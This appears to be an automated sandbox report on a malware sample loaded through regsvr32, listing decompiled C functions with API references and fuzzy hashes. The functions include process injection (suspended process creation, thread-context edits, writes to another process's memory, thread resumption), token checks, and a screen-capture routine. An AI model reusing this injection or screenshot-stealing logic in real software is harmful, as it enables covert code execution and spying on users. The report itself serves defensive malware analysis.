0x02bcd9c5

APIs

Part of subcall function 02BC8F63: memset.MSVCRT ref: 02BC8F75

Part of subcall function 02BCBE10: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 02BCBE52

Part of subcall function 02BCD9DE: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 02BCDA40
Part of subcall function 02BCD9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 02BCDA89
Part of subcall function 02BCD9DE: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 02BCDAA6
Part of subcall function 02BCD9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 02BCDAC7

GetLastError.KERNEL32(?,?,00000001), ref: 02BCD939

Part of subcall function 02BCDADC: ResumeThread.KERNELBASE(?,02BCD947,?,?,00000001), ref: 02BCDAE4

FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 02BCD964

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
String ID:
API String ID: 2212882986-0
Opcode ID: 41780c167b5c96013c2fd0ce8f9ebfec626962889e3b3373000ca83d7c683d4a
Instruction ID: 32f5a5e90578bb2122b29f7978a9abf5e057eeb90dfc63e88ee696f160b45cd0
Opcode Fuzzy Hash: 41780c167b5c96013c2fd0ce8f9ebfec626962889e3b3373000ca83d7c683d4a
Instruction Fuzzy Hash: A4416279E0020AAFCB15EBA5D984AEEB7B9FF48314F2444BDE605E7254D771A9018B20

Uniqueness

Uniqueness Score: -1.00%

Function 02BC6603 Relevance: 3.1, APIs: 2, Instructions: 78
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
				long _v8;
				intOrPtr _t15;
				WCHAR* _t23;
				long _t24;
				void* _t28;
				void* _t31;
				intOrPtr _t36;
				void* _t41;
				void* _t48;
				intOrPtr* _t49;

				_push(__ecx);
				if(_a8 != 1) {
					__eflags = _a8;
					if(_a8 != 0) {
						L7:
						__eflags = 1;
						return 1;
					}
					_t15 =  *0x2bdf8d0; // 0x483f8c0
					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
					L3:
					return 0;
				}
				E02BC8DB4();
				E02BC9787();
				 *0x2bdf8e8 = _a4;
				E02BD3D36(_a4);
				 *_t49 = 0xf2e;
				 *0x2bdf8d0 = E02BCF0D9(0x2bdca88, 0x138);
				 *_t49 = 0xe8d;
				_t23 = E02BC9F85(0x2bdca88);
				_pop(_t41);
				_a8 = _t23;
				_t24 = GetFileAttributesW(_t23); // executed
				_push( &_a8);
				if(_t24 == 0xffffffff) {
					E02BC8D9A();
					 *_t49 = 0x1f4;
					_t28 = E02BCFCDA(E02BC109A(_t41));
					_a8 = _t28;
					__eflags = _t28;
					if(_t28 != 0) {
						_t48 = 0x54;
						 *0x2bdf8e0 = E02BCF0D9(0x2bdcbf0, _t48);
						E02BC647A(_t48, __eflags);
						E02BC8DDF( &_a8, 0xfffffffe);
						_t36 =  *0x2bdf8d0; // 0x483f8c0
						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x641);
					}
					_v8 = 0;
					_t31 = CreateThread(0, 0, E02BC63A2, 0, 0,  &_v8);
					 *0x2bdf8f4 = _t31;
					__eflags = _t31;
					if(_t31 == 0) {
						goto L3;
					} else {
						goto L7;
					}
				}
				E02BC8D9A();
				goto L3;
			}

0x02bc6606
0x02bc660b
0x02bc66ef
0x02bc66f3
0x02bc66e8
0x02bc66ea
0x00000000
0x02bc66ea
0x02bc66f5
0x02bc66ff
0x02bc666a
0x00000000
0x02bc666a
0x02bc6611
0x02bc6616
0x02bc661f
0x02bc6624
0x02bc662e
0x02bc663f
0x02bc6644
0x02bc664b
0x02bc6650
0x02bc6652
0x02bc6655
0x02bc6661
0x02bc6662
0x02bc666e
0x02bc6673
0x02bc6682
0x02bc6687
0x02bc668a
0x02bc668c
0x02bc6695
0x02bc66a0
0x02bc66a5
0x02bc66b0
0x02bc66b5
0x02bc66bf
0x02bc66bf
0x02bc66d9
0x02bc66dc
0x02bc66df
0x02bc66e4
0x02bc66e6
0x00000000
0x00000000
0x00000000
0x00000000
0x02bc66e6
0x02bc6664
0x00000000

APIs

Part of subcall function 02BC8DB4: HeapCreate.KERNELBASE(00000000,00096000,00000000,02BC6616), ref: 02BC8DBD

Part of subcall function 02BCF0D9: GetModuleHandleA.KERNEL32(00000000,?,?,?,02BDCA88,?,02BC663F,?), ref: 02BCF0FB

GetFileAttributesW.KERNELBASE(00000000), ref: 02BC6655
CreateThread.KERNELBASE(00000000,00000000,02BC63A2,00000000,00000000,?), ref: 02BC66DC

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Create$AttributesFileHandleHeapModuleThread
String ID:
API String ID: 607385197-0
Opcode ID: 034ce37652801edcf5e412e54cc2919d64df0f0077d95c9bc47b5388af715317
Instruction ID: 22cfed8233633672e50a85673b0ff061efd6ec9f2d998905a9e56e406a188ab3
Opcode Fuzzy Hash: 034ce37652801edcf5e412e54cc2919d64df0f0077d95c9bc47b5388af715317
Instruction Fuzzy Hash: 8E216B71984205EFDB04BFB4D814EAE37EAAF45354F2489AEE11ACB180EB75D540CF22

Uniqueness

Uniqueness Score: -1.00%

Function 02BCF0D9 Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E02BCF0D9(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E02BC9F6B(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0xf2e) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E02BCF08E(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E02BC8D87( &_v8);
				return _t25;
			}

0x02bcf0dc
0x02bcf0df
0x02bcf0e5
0x02bcf0e7
0x02bcf0ec
0x02bcf0ee
0x02bcf0f8
0x02bcf0f9
0x02bcf108
0x02bcf0fb
0x02bcf0fb
0x02bcf0fb
0x02bcf10c
0x02bcf113
0x02bcf119
0x02bcf119
0x02bcf11e
0x02bcf129

APIs

GetModuleHandleA.KERNEL32(00000000,?,?,?,02BDCA88,?,02BC663F,?), ref: 02BCF0FB
LoadLibraryA.KERNELBASE(00000000,?,?,?,02BDCA88,?,02BC663F,?), ref: 02BCF108

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 0766408138f38c67b7275c628a38178f08b5ff55c166fae6b7e4aa1e6c552ff7
Instruction ID: f866467737df9b2cd5768d95894626b6d5cf594cebdb5b0e027c1178abce18c0
Opcode Fuzzy Hash: 0766408138f38c67b7275c628a38178f08b5ff55c166fae6b7e4aa1e6c552ff7
Instruction Fuzzy Hash: 7EF0A731704114ABD704ABADE8554BAB3EEDF58795B3445FFF006D7250DAB09D4087A0

Uniqueness

Uniqueness Score: -1.00%

Function 02BCCA5A Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E02BCCA5A(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E02BCC92F(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E02BCC986(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						FindCloseChangeNotification(_v16);
						if(_t48 != 0) {
							E02BC8DDF( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x2bdf8d8; // 0x483fab0
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x2bdf8d8; // 0x483fab0
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x2bdf8d8; // 0x483fab0
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}

0x02bcca61
0x02bcca63
0x02bcca6a
0x02bcca6c
0x02bcca6f
0x02bcca74
0x02bcca79
0x02bcca83
0x02bcca86
0x02bcca89
0x02bcca8e
0x02bcca90
0x02bcca96
0x02bccaf6
0x02bccafe
0x02bccb04
0x02bccb0b
0x02bccb11
0x00000000
0x02bccb12
0x02bcca9b
0x02bcca9c
0x02bcca9d
0x02bcca9e
0x02bcca9f
0x02bccaa0
0x02bccaa1
0x02bccaa2
0x02bccaa7
0x02bccaa9
0x02bccaae
0x02bccaaf
0x02bccab9
0x00000000
0x00000000
0x02bccabd
0x02bccae9
0x02bccae9
0x02bccaf1
0x02bccaf4
0x00000000
0x02bccaf4
0x02bccabf
0x02bccabf
0x02bccac2
0x02bccac5
0x02bccac5
0x02bccac8
0x02bccaca
0x02bccad4
0x00000000
0x00000000
0x02bccad9
0x02bccada
0x02bccadd
0x02bccae2
0x00000000
0x00000000
0x00000000
0x02bccae4
0x02bccae8
0x00000000
0x02bccae8
0x02bccb17

APIs

Part of subcall function 02BCC92F: GetCurrentThread.KERNEL32 ref: 02BCC942
Part of subcall function 02BCC92F: GetLastError.KERNEL32(?,?,02BCCA74,00000000,02BC0000), ref: 02BCC950

Part of subcall function 02BCC986: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,02BC0000,00000000,00000000,?,02BCCA07,00000000,00000000,?,02BCCA30), ref: 02BCC9A1
Part of subcall function 02BCC986: GetLastError.KERNEL32(?,02BCCA07,00000000,00000000,?,02BCCA30,00001644,?,02BCE053), ref: 02BCC9A8

FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,02BC0000), ref: 02BCCAFE

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ErrorLast$ChangeCloseCurrentFindInformationNotificationThreadToken
String ID:
API String ID: 3430231349-0
Opcode ID: 740bc01378330e35871cc12acfa793a6d8273dd3c0cf5fde376bf6f679905e9a
Instruction ID: 8d8f2a4ac02f0a96410bbf1b397ddd72e24c629bce6598d41fb615125bf5ac00
Opcode Fuzzy Hash: 740bc01378330e35871cc12acfa793a6d8273dd3c0cf5fde376bf6f679905e9a
Instruction Fuzzy Hash: 57219231A04209AFCB10DFA9DC88EAEBBF9EF14300F2444AEE519E7151E770E9018B60

Uniqueness

Uniqueness Score: -1.00%

Function 02BC63A2 Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E02BC63A2(void* __fp0) {
				void* __ecx;
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				intOrPtr _t17;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				void* _t27;

				_t32 = __fp0;
				E02BC651E();
				GetOEMCP();
				_t13 = E02BCDFC2(__fp0); // executed
				 *0x2bdf8d4 = _t13;
				if(_t13 != 0) {
					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
					_t14 =  *0x2bdf8d4; // 0x483fc00
					E02BD3C36( *((intOrPtr*)(_t14 + 0x224)));
					_t26 =  *0x2bdf8d4; // 0x483fc00
					_t25 = _t27;
					__eflags =  *(_t26 + 0x1898) & 0x00010000;
					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
						_t16 = E02BCD889(_t26); // executed
						__eflags = _t16;
						_t17 =  *0x2bdf8d4; // 0x483fc00
						if(_t16 != 0) {
							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
								L10:
								__eflags = 0;
								return 0;
							}
							L9:
							E02BC3597();
							goto L10;
						}
						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
						L6:
						_t20 =  *0x2bdf8d4; // 0x483fc00
						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
						if(__eflags == 0) {
							goto L9;
						}
						E02BC61E8(_t25, _t26, __eflags, _t32);
						goto L10;
					}
					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
					goto L6;
				}
				return _t13 + 1;
			}

0x02bc63a2
0x02bc63a2
0x02bc63a7
0x02bc63ae
0x02bc63b3
0x02bc63bb
0x02bc63c4
0x02bc63ca
0x02bc63d5
0x02bc63da
0x02bc63e0
0x02bc63e1
0x02bc63eb
0x02bc63fb
0x02bc6400
0x02bc6402
0x02bc6407
0x02bc6424
0x02bc642b
0x02bc6432
0x02bc6432
0x00000000
0x02bc6434
0x02bc642d
0x02bc642d
0x00000000
0x02bc642d
0x02bc6409
0x02bc640f
0x02bc640f
0x02bc6414
0x02bc641b
0x00000000
0x00000000
0x02bc641d
0x00000000
0x02bc641d
0x02bc63ed
0x00000000
0x02bc63ed
0x00000000

APIs

GetOEMCP.KERNEL32 ref: 02BC63A7

Part of subcall function 02BCDFC2: GetCurrentProcessId.KERNEL32 ref: 02BCDFE9
Part of subcall function 02BCDFC2: GetLastError.KERNEL32 ref: 02BCE0E3
Part of subcall function 02BCDFC2: GetSystemMetrics.USER32(00001000), ref: 02BCE0F3

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CurrentErrorLastMetricsProcessSystem
String ID:
API String ID: 1196160345-0
Opcode ID: 87c1550da885ffa338c25f860b4d1d2b7453b5ce3bdd4b85647cb6ce433292ed
Instruction ID: 4b6d29436ed8dc16f9f58021c780d9ba003a5b8509327189e453e37053595b59
Opcode Fuzzy Hash: 87c1550da885ffa338c25f860b4d1d2b7453b5ce3bdd4b85647cb6ce433292ed
Instruction Fuzzy Hash: 44015A71989252CFC214EB68E918BE673E9EF85340F7C05FEE0498B515E7305450CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02BCCA0A Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BCCA0A(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t12 =  *0x2bdf8d8; // 0x483fab0
				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
				if(_t13 != 0) {
					_t14 = E02BCC9F3(); // executed
					_t23 = _t14;
					if(_t23 != 0) {
						FindCloseChangeNotification(_v8);
						_t17 = _t23;
					} else {
						if(_v8 != _t14) {
							_t18 =  *0x2bdf8d0; // 0x483f8c0
							 *((intOrPtr*)(_t18 + 0x30))(_v8);
						}
						_t17 = 0;
					}
					return _t17;
				} else {
					return _t13;
				}
			}

0x02bcca0e
0x02bcca16
0x02bcca1e
0x02bcca23
0x02bcca2b
0x02bcca30
0x02bcca34
0x02bcca52
0x02bcca55
0x02bcca36
0x02bcca39
0x02bcca3b
0x02bcca43
0x02bcca43
0x02bcca46
0x02bcca46
0x02bcca59
0x02bcca26
0x02bcca26
0x02bcca26

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b071e4527c735100a405cafad6f5fa936db9291f0121d0cbf49b743f244732d
Instruction ID: 6ce521766c3a57ba2f4fb030234e37b84c70283e86088187f971d232cc4b8b0f
Opcode Fuzzy Hash: 5b071e4527c735100a405cafad6f5fa936db9291f0121d0cbf49b743f244732d
Instruction Fuzzy Hash: 36F06731A51144EFCB10DBA8C809AAD7BE8FF04289F2440E9E10AE7110E770EE00DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02BC6438 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BC6438() {
				intOrPtr _t3;

				_t3 =  *0x2bdf8d0; // 0x483f8c0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x2bdf8f4, 0xffffffff);
				ExitProcess(0);
			}

0x02bc6438
0x02bc6445
0x02bc644f

APIs

ExitProcess.KERNEL32(00000000), ref: 02BC644F

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 2009eb0252acc1d5cad49320415db29174ce350e611c31fed07834431c39d5fa
Instruction ID: 73289510ff909f1b2f4fc43d7ea90e2bb80f3e5a8cee74425c614f3e06295d1a
Opcode Fuzzy Hash: 2009eb0252acc1d5cad49320415db29174ce350e611c31fed07834431c39d5fa
Instruction Fuzzy Hash: 76C012705CA080DFC7405B64DC18F6437E0BF08361F298A50F11EC75E4DA2164108B11

Uniqueness

Uniqueness Score: -1.00%

Function 02BC8DC9 Relevance: 1.5, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BC8DC9(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x2bdf9b8, 8, _a4); // executed
				return _t2;
			}

0x02bc8dd7
0x02bc8dde

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,02BC9793,00000100,?,02BC661B), ref: 02BC8DD7

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1aeb9ba435beb4bc5078d7b2843aea284089fe2018b0567f18cd3f42f65d7a4f
Instruction ID: 1a3f94dd66c9a6d4997b367418cc45c3a48fb800688dc880bad18cfdae369d43
Opcode Fuzzy Hash: 1aeb9ba435beb4bc5078d7b2843aea284089fe2018b0567f18cd3f42f65d7a4f
Instruction Fuzzy Hash: 3CB0923A8C6608BBCF411A81FC15AD43F29EB087D1F408410F7098A460AB63A4719B84

Uniqueness

Uniqueness Score: -1.00%

Function 02BCDADC Relevance: 1.5, APIs: 1, Instructions: 7
threadCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E02BCDADC(void* __ecx) {
				signed int _t4;

				_t4 = ResumeThread( *(__ecx + 4));
				asm("sbb eax, eax");
				return  ~_t4 & 0x00000001;
			}

0x02bcdae4
0x02bcdaec
0x02bcdaf1

APIs

ResumeThread.KERNELBASE(?,02BCD947,?,?,00000001), ref: 02BCDAE4

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b01953818851584039391be813a09b26ec23bd8448b40a5f5e827cae20636057
Instruction ID: e58a4ca56ac2ca173e4766d639da65a997d15be33e834d3e4c5ef5dfbf5070f1
Opcode Fuzzy Hash: b01953818851584039391be813a09b26ec23bd8448b40a5f5e827cae20636057
Instruction Fuzzy Hash: F4B092322E40419FCB005B74DC1A9A03BE0BB56606BACC6E4E00AC6461D22BD4558B40

Uniqueness

Uniqueness Score: -1.00%

Function 02BC8DB4 Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BC8DB4() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x2bdf9b8 = _t1;
				return _t1;
			}

0x02bc8dbd
0x02bc8dc3
0x02bc8dc8

APIs

HeapCreate.KERNELBASE(00000000,00096000,00000000,02BC6616), ref: 02BC8DBD

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 7f4af9d8f5a996f27f028844dc22417622aee5d802a2054a2f6bbfdb8a081cb1
Instruction ID: 6fcc290698ed04184b777913c708be5f3dbb1ed52270d6b0b8e4630d7380b6e4
Opcode Fuzzy Hash: 7f4af9d8f5a996f27f028844dc22417622aee5d802a2054a2f6bbfdb8a081cb1
Instruction Fuzzy Hash: 2EB01270ECB300B6DB501B206C96B4035105344BC2F204401F70ADA1C0E7B010209514

Uniqueness

Uniqueness Score: -1.00%

Function 02BCDAF2 Relevance: 1.3, APIs: 1, Instructions: 50
sleepCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E02BCDAF2(void* __ecx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t26;
				signed int _t28;
				signed int* _t36;
				signed int* _t39;

				_push(__ecx);
				_push(__ecx);
				_t36 = _a8;
				_t28 = _t36[1];
				if(_t28 != 0) {
					_t39 = _t36[2];
					do {
						_a8 = _a8 & 0x00000000;
						if(_t39[2] > 0) {
							_t31 = _t39[3];
							_t22 = _a4 + 0x24;
							_v12 = _a4 + 0x24;
							_v8 = _t39[3];
							while(E02BCA236(_t22,  *_t31) != 0) {
								_t26 = _a8 + 1;
								_t31 = _v8 + 4;
								_a8 = _t26;
								_t22 = _v12;
								_v8 = _v8 + 4;
								if(_t26 < _t39[2]) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t36 =  *_t36 |  *_t39;
						}
						L8:
						_t39 =  &(_t39[4]);
						_t28 = _t28 - 1;
					} while (_t28 != 0);
				}
				Sleep(0xa);
				return 1;
			}

0x02bcdaf5
0x02bcdaf6
0x02bcdaf9
0x02bcdafc
0x02bcdb01
0x02bcdb04
0x02bcdb07
0x02bcdb07
0x02bcdb0f
0x02bcdb14
0x02bcdb17
0x02bcdb1a
0x02bcdb1d
0x02bcdb20
0x02bcdb33
0x02bcdb34
0x02bcdb37
0x02bcdb3d
0x02bcdb40
0x02bcdb43
0x00000000
0x00000000
0x02bcdb45
0x00000000
0x02bcdb43
0x02bcdb49
0x02bcdb49
0x02bcdb4b
0x02bcdb4b
0x02bcdb4e
0x02bcdb4e
0x02bcdb53
0x02bcdb5b
0x02bcdb67

APIs

Sleep.KERNELBASE(0000000A), ref: 02BCDB5B

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b1ff401f3b728808070fdaa4376078b26a49142b288ff02bfab4cce100d1578e
Instruction ID: d98301d2d94994a31b4297259b3da72ea69f50243cde3a40623e5179f895c9c2
Opcode Fuzzy Hash: b1ff401f3b728808070fdaa4376078b26a49142b288ff02bfab4cce100d1578e
Instruction Fuzzy Hash: FA111B75A00206AFDB14DF99C484AA9B7F8FF45324F2484ADE95ADB300D370E941CB50

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02BC5D1E Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 223
windowCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E02BC5D1E(int* __ecx) {
				signed int _v8;
				char _v12;
				int _v16;
				struct HWND__* _v20;
				struct HWND__* _v24;
				struct HDC__* _v28;
				void* _v32;
				int* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				short _v82;
				short _v84;
				signed int _v88;
				signed int _v92;
				struct tagBITMAPINFO _v96;
				intOrPtr _v102;
				int _v110;
				char _v112;
				void* _v116;
				void* _v120;
				void* _v124;
				void* _v132;
				void* _v136;
				void* _v140;
				int _v156;
				signed int _v160;
				void _v164;
				int _t82;
				void* _t84;
				signed int _t92;
				void* _t99;
				char _t103;
				intOrPtr _t113;
				int* _t114;
				struct HDC__* _t120;
				signed int _t124;
				short _t137;
				struct HDC__* _t141;
				void* _t144;
				void* _t148;

				_v36 = __ecx;
				_v24 = 0;
				_t120 = 0;
				_v12 = 0;
				_t144 = 0;
				_v20 = 0;
				_t141 = GetDC(0);
				_v28 = _t141;
				if(_t141 != 0) {
					_t120 = CreateCompatibleDC(_t141);
					if(_t120 != 0) {
						_v8 = GetDeviceCaps(_t141, 8);
						_t82 = GetDeviceCaps(_t141, 0xa);
						_v16 = _t82;
						_t144 = CreateCompatibleBitmap(_t141, _v8, _t82);
						if(_t144 != 0) {
							_t84 = SelectObject(_t120, _t144);
							_v32 = _t84;
							if(_t84 != 0) {
								_t144 = SelectObject(_t120, _v32);
								if(_t144 != 0) {
									GetObjectW(_t144, 0x18,  &_v164);
									_t92 = _v160;
									_t124 = _v156;
									_v92 = _t92;
									_v84 = 1;
									_t137 = 0x20;
									_v82 = _t137;
									_v96.bmiHeader = 0x28;
									_v80 = 0;
									_v76 = 0;
									_v72 = 0;
									_v68 = 0;
									_v64 = 0;
									_v60 = 0;
									asm("cdq");
									_v88 = _t124;
									_v8 = ((_t92 << 5) + 0x1f >> 5) * _t124 << 2;
									_t99 = E02BC8DC9(((_t92 << 5) + 0x1f >> 5) * _t124 << 2);
									_v20 = _t99;
									if(_t99 != 0) {
										GetDIBits(_t120, _t144, 0, _v156, _t99,  &_v96, 0);
										_v16 = _v8 + 0x36;
										_t103 = E02BC8DC9(_v8 + 0x36);
										_v12 = _t103;
										if(_t103 != 0) {
											_v110 = _v16;
											_v112 = 0x4d42;
											_v102 = 0x36;
											E02BC8EA6(_t103,  &_v112, 0xe);
											E02BC8EA6(_v12 + 0xe,  &_v96, 0x28);
											E02BC8EA6(_v12 + 0x36, _v20, _v8);
											_t148 = _t148 + 0x24;
											_v8 = _v8 & 0x00000000;
											_t113 = E02BCFBFB(_v12, _v16,  &_v8);
											_v24 = _t113;
											if(_t113 != 0) {
												_t114 = _v36;
												if(_t114 != 0) {
													 *_t114 = _v8;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				E02BC8DDF( &_v20, 0);
				E02BC8DDF( &_v12, 0);
				if(_t120 != 0) {
					DeleteDC(_t120);
				}
				if(_t141 != 0) {
					DeleteDC(_t141);
				}
				if(_t144 != 0) {
					DeleteObject(_t144);
				}
				return _v24;
			}

0x02bc5d2a
0x02bc5d30
0x02bc5d33
0x02bc5d35
0x02bc5d38
0x02bc5d3a
0x02bc5d43
0x02bc5d45
0x02bc5d4a
0x02bc5d57
0x02bc5d5b
0x02bc5d6f
0x02bc5d72
0x02bc5d78
0x02bc5d82
0x02bc5d86
0x02bc5d8e
0x02bc5d94
0x02bc5d99
0x02bc5e2f
0x02bc5e33
0x02bc5e43
0x02bc5e49
0x02bc5e51
0x02bc5e58
0x02bc5e5b
0x02bc5e64
0x02bc5e65
0x02bc5e6e
0x02bc5e75
0x02bc5e78
0x02bc5e7b
0x02bc5e7e
0x02bc5e81
0x02bc5e84
0x02bc5e87
0x02bc5e8b
0x02bc5e9a
0x02bc5e9d
